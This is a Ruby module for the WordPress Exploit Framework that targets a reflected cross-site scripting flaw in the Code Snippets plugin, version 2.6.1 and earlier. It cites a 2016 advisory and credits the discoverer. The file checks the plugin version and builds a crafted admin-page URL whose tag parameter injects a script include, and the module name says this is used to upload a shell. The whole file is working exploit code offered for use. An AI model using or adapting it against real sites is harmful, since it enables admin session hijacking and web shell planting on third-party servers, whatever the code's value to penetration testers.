# frozen_string_literal: true

class Wpxf::Exploit::CodeSnippetsReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'Code Snippets <= 2.6.1 Reflected XSS Shell Upload',
      author: [
        'Burak Kelebek', # Discovery
        'rastating'      # WPXF module
      ],
      references: [
        ['WPVDB', '8566'],
        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_code_snippets_wordpress_plugin.html']
      ],
      date: 'Jul 24 2016'
    )
  end

  def check
    check_plugin_version_from_readme('code-snippets', '2.7')
  end

  def vulnerable_url
    normalize_uri(wordpress_url_admin, 'admin.php')
  end

  def url_with_xss
    "#{vulnerable_url}?page=snippets&tag=%5C%5C%27%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E"
  end
end
